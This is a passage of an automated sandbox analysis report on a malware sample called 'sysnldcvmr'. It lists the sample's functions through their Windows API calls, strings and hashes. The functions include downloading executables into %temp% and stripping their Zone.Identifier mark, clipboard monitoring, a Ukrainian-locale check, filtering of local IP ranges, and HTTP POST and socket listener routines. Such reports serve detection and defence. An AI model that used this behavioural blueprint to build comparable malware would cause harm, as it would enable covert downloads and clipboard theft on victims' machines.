                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                    • String ID: Bz@
                                                                                                                    • API String ID: 1815803762-793989200
                                                                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                    • Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
                                                                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                    • Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8
                                                                                                                    Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3943618503-0
                                                                                                                    • Opcode ID: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                                                                    • Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
                                                                                                                    • Opcode Fuzzy Hash: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                                                                    • Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A
                                                                                                                    Function 0040E730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
                                                                                                                    • strcmp.NTDLL ref: 0040E752
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocalestrcmp
                                                                                                                    • String ID: UKR
                                                                                                                    • API String ID: 3191669094-64918367
                                                                                                                    • Opcode ID: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                                                                    • Instruction ID: f5851dfa2a24cd6eecb4ca89505c7c91e938839c44774f0d29bfbb74be006053
                                                                                                                    • Opcode Fuzzy Hash: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                                                                    • Instruction Fuzzy Hash: 10E02B36E44308B6D900B6B15E03FEA772C5711B09F0045B6FF14A71C1F5B5922AC39B
                                                                                                                    Function 0040EAE0 Relevance: 72.0, APIs: 34, Strings: 7, Instructions: 227filenetworksleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040EAE9
                                                                                                                    • srand.MSVCRT ref: 0040EAF0
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
                                                                                                                    • strlen.NTDLL ref: 0040EB1A
                                                                                                                    • mbstowcs.NTDLL ref: 0040EB31
                                                                                                                    • rand.MSVCRT ref: 0040EB39
                                                                                                                    • rand.MSVCRT ref: 0040EB4D
                                                                                                                    • wsprintfW.USER32 ref: 0040EB74
                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
                                                                                                                    • wsprintfW.USER32 ref: 0040EC74
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EC84
                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040ECA5
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040ECCD
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040ECE3
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ECFD
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ED0A
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040ED15
                                                                                                                    • rand.MSVCRT ref: 0040ED2A
                                                                                                                    • Sleep.KERNEL32 ref: 0040ED3B
                                                                                                                    • rand.MSVCRT ref: 0040ED41
                                                                                                                    • rand.MSVCRT ref: 0040ED55
                                                                                                                    • wsprintfW.USER32 ref: 0040ED7C
                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
                                                                                                                    • wsprintfW.USER32 ref: 0040EDB9
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EDC9
                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040EDEA
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040EE11
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EE20
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@
                                                                                                                    • API String ID: 3709769524-1557916875
                                                                                                                    • Opcode ID: f19e2e49e4841eae6c8170c725b321c375bdafcc36d8594c690cf09b2969f998
                                                                                                                    • Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
                                                                                                                    • Opcode Fuzzy Hash: f19e2e49e4841eae6c8170c725b321c375bdafcc36d8594c690cf09b2969f998
                                                                                                                    • Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59
                                                                                                                    Function 0040AEA0 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 449 40aea0-40aeb7 call 40add0 452 40aeb9 449->452 453 40aebe-40aeda call 40aa20 strcmp 449->453 454 40b145-40b148 452->454 457 40aee1-40aefd call 40aa20 strstr 453->457 458 40aedc 453->458 461 40af40-40af5c call 40aa20 strstr 457->461 462 40aeff-40af1b call 40aa20 strstr 457->462 458->454 467 40af5e-40af7a call 40aa20 strstr 461->467 468 40af9f-40afbb call 40aa20 strstr 461->468 469 40af3b 462->469 470 40af1d-40af39 call 40aa20 strstr 462->470 477 40af9a 467->477 478 40af7c-40af98 call 40aa20 strstr 467->478 479 40afbd-40afd9 call 40aa20 strstr 468->479 480 40affe-40b014 EnterCriticalSection 468->480 469->454 470->461 470->469 477->454 478->468 478->477 488 40aff9 479->488 489 40afdb-40aff7 call 40aa20 strstr 479->489 481 40b01f-40b028 480->481 485 40b059-40b064 call 40b150 481->485 486 40b02a-40b03a 481->486 497 40b13a-40b13f LeaveCriticalSection 485->497 498 40b06a-40b078 485->498 490 40b057 486->490 491 40b03c-40b055 call 40d4a0 486->491 488->454 489->480 489->488 490->481 491->485 497->454 501 40b07a 498->501 502 40b07e-40b08f call 409d90 498->502 501->502 502->497 505 40b095-40b0b2 call 40d4a0 502->505 508 40b0b4-40b0c4 505->508 509 40b10a-40b122 505->509 510 40b0d0-40b108 call 40a1b0 508->510 511 40b0c6-40b0ce Sleep 508->511 512 40b128-40b133 call 40b150 509->512 510->512 511->508 512->497 517 40b135 call 40ab80 512->517 517->497
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                                                                      • Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                                                                    • strcmp.NTDLL ref: 0040AED0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                    • API String ID: 2906596889-2213908610
                                                                                                                    • Opcode ID: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                                                                    • Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
                                                                                                                    • Opcode Fuzzy Hash: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                                                                    • Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E
                                                                                                                    Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 519 401920-401947 GetTickCount WaitForSingleObject 520 401ac9-401acf 519->520 521 40194d-401964 WSAWaitForMultipleEvents 519->521 522 4019f0-401a03 GetTickCount 521->522 523 40196a-401981 WSAEnumNetworkEvents 521->523 524 401a43-401a4c GetTickCount 522->524 525 401a05-401a14 EnterCriticalSection 522->525 523->522 526 401983-401988 523->526 528 401ab5-401ac3 WaitForSingleObject 524->528 529 401a4e-401a5d EnterCriticalSection 524->529 530 401a16-401a1d 525->530 531 401a3a-401a41 LeaveCriticalSection 525->531 526->522 527 40198a-401990 526->527 527->522 532 401992-4019b1 accept 527->532 528->520 528->521 533 401aa1-401ab1 LeaveCriticalSection GetTickCount 529->533 534 401a5f-401a77 InterlockedExchangeAdd call 40d4a0 529->534 535 401a35 call 401820 530->535 536 401a1f-401a27 530->536 531->528 532->522 538 4019b3-4019c2 call 4022c0 532->538 533->528 544 401a97-401a9f 534->544 545 401a79-401a82 534->545 535->531 536->530 540 401a29-401a30 LeaveCriticalSection 536->540 538->522 546 4019c4-4019df call 401740 538->546 540->528 544->533 544->534 545->544 547 401a84-401a8d call 40ab40 545->547 546->522 552 4019e1-4019e7 546->552 547->544 552->522 553 4019e9-4019eb call 401cf0 552->553 553->522
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                    • String ID: PCOI$ilci
                                                                                                                    • API String ID: 3345448188-3762367603
                                                                                                                    • Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                                                                    • Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
                                                                                                                    • Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                                                                    • Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99
                                                                                                                    Function 0040E4F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • memset.NTDLL ref: 0040E518
                                                                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
                                                                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
                                                                                                                    • HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E701
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E70E
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E71B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                    • API String ID: 2761394606-2217117414
                                                                                                                    • Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                                                                    • Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
                                                                                                                    • Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                                                                    • Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54
                                                                                                                    Function 00405970 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 584 405970-405992 GetWindowLongW 585 405994-40599b 584->585 586 4059b6-4059bd 584->586 587 4059a1-4059a5 585->587 588 405a27-405a38 IsClipboardFormatAvailable 585->588 589 4059e6-4059ec 586->589 590 4059bf 586->590 591 4059c4-4059e1 SetClipboardViewer SetWindowLongW 587->591 592 4059a7-4059ab 587->592 596 405a43-405a4d IsClipboardFormatAvailable 588->596 597 405a3a-405a41 588->597 594 405a06-405a0a 589->594 595 4059ee-405a04 SetWindowLongW 589->595 593 405ba4-405bbd DefWindowProcA 590->593 591->593 598 4059b1 592->598 599 405b5d-405b9e RegisterRawInputDevices ChangeClipboardChain 592->599 600 405a22 594->600 601 405a0c-405a1c SendMessageA 594->601 595->600 603 405a58-405a62 IsClipboardFormatAvailable 596->603 604 405a4f-405a56 596->604 602 405a6b-405a6f 597->602 598->593 599->593 600->593 601->600 606 405a75-405a7f OpenClipboard 602->606 607 405b3f-405b43 602->607 603->602 605 405a64 603->605 604->602 605->602 606->607 608 405a85-405a96 GetClipboardData 606->608 609 405b45-405b55 SendMessageA 607->609 610 405b5b 607->610 611 405a98 608->611 612 405a9d-405aae GlobalLock 608->612 609->610 610->593 611->593 613 405ab0 612->613 614 405ab5-405ac6 612->614 613->593 615 405ac8-405acc 614->615 616 405ae9-405afc call 405690 614->616 618 405afe-405b0e call 4057b0 615->618 619 405ace-405ad2 615->619 624 405b11-405b25 GlobalUnlock CloseClipboard 616->624 618->624 622 405ad4 619->622 623 405ad6-405ae7 call 405570 619->623 622->624 623->624 624->607 627 405b27-405b3c call 404970 call 40a1b0 624->627 627->607
                                                                                                                    APIs
                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040597C
                                                                                                                    • SetClipboardViewer.USER32(?), ref: 004059C8
                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405A77
                                                                                                                    • GetClipboardData.USER32(00000000), ref: 00405A89
                                                                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
                                                                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405B9E
                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3549449529-0
                                                                                                                    • Opcode ID: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                                                                    • Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
                                                                                                                    • Opcode Fuzzy Hash: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                                                                    • Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69
                                                                                                                    Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                    • String ID: PCOI$ilci
                                                                                                                    • API String ID: 2403999931-3762367603
                                                                                                                    • Opcode ID: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                                                                    • Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
                                                                                                                    • Opcode Fuzzy Hash: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                                                                    • Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98
                                                                                                                    Function 00405880 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • memset.NTDLL ref: 00405898
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 004058C4
                                                                                                                    • GetTickCount.KERNEL32 ref: 004058CA
                                                                                                                    • GetTickCount.KERNEL32 ref: 004058D3
                                                                                                                    • wsprintfW.USER32 ref: 004058E6
                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 004058F3
                                                                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
                                                                                                                    • TranslateMessage.USER32(?), ref: 00405945
                                                                                                                    • DispatchMessageA.USER32(?), ref: 0040594F
                                                                                                                    • ExitThread.KERNEL32 ref: 00405961
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                    • String ID: %x%X$0
                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                    • Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                                                                    • Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
                                                                                                                    • Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                                                                    • Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68
                                                                                                                    Function 0040DBC0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
